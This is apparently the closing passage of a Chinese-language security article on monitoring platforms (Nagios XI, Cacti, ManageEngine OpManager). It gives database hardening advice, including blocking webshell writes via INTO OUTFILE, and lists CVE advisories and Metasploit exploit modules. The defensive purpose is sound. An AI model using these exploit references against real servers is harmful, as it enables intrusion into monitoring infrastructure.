修改监控平台的默认 MySQL/MariaDB 密码 限制数据库用户权限,禁用 FILE 权限(防止 INTO OUTFILE 写 webshell) 数据库监听地址绑定 127.0.0.1,禁止远程访问 定期备份监控配置和数据库 0x07 参考资料 Nagios XI 官方安全公告 - https://www.nagios.com/security-disclosures/nagios-xi/ NCC Group - Multiple Vulnerabilities in Nagios XI (CVE-2023-47401 等 16 个漏洞) - https://research.nccgroup.com/2023/12/13/technical-advisory-multiple-vulnerabilities-in-nagios-xi/ NVD - CVE-2024-24401 Nagios XI SQL Injection - https://nvd.nist.gov/vuln/detail/CVE-2024-24401 SonarSource - Cacti Unauthenticated RCE (CVE-2022-46169) - https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/ Black Duck CyRC - CVE-2023-51448 Cacti Blind SQLi - https://www.blackduck.com/blog/cyrc-vulnerability-advisory-cve-2023-51448.html GitHub - Cacti Security Advisory GHSA-pfh9-gwm6-86vp (CVE-2023-49084) - https://github.com/Cacti/cacti/security/advisories/GHSA-pfh9-gwm6-86vp Haxolot - Pre-Auth RCE in ManageEngine OpManager (CVE-2021-3287) - https://haxolot.com/posts/2021/manageengine_opmanager_pre_auth_rce/ ManageEngine OpManager Security Updates - https://www.manageengine.com/network-monitoring/security-updates/ Metasploit - Nagios XI ConfigWizards Authenticated RCE - https://www.rapid7.com/db/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce/ Rapid7 - ManageEngine OpManager SUM Deserialization (CVE-2020-28653/CVE-2021-3287) - https://github.com/rapid7/metasploit-framework/pull/15670 Tenable - ManageEngine OpManager RCE (CVE-2024-5466) - https://www.tenable.com/plugins/nessus/206271 Obrela - Nagios XI CVE-2024-24401 Advisory - https://www.obrela.com/advisory/nagios-xi-critical-vulnerability-with-cve-2024-24401/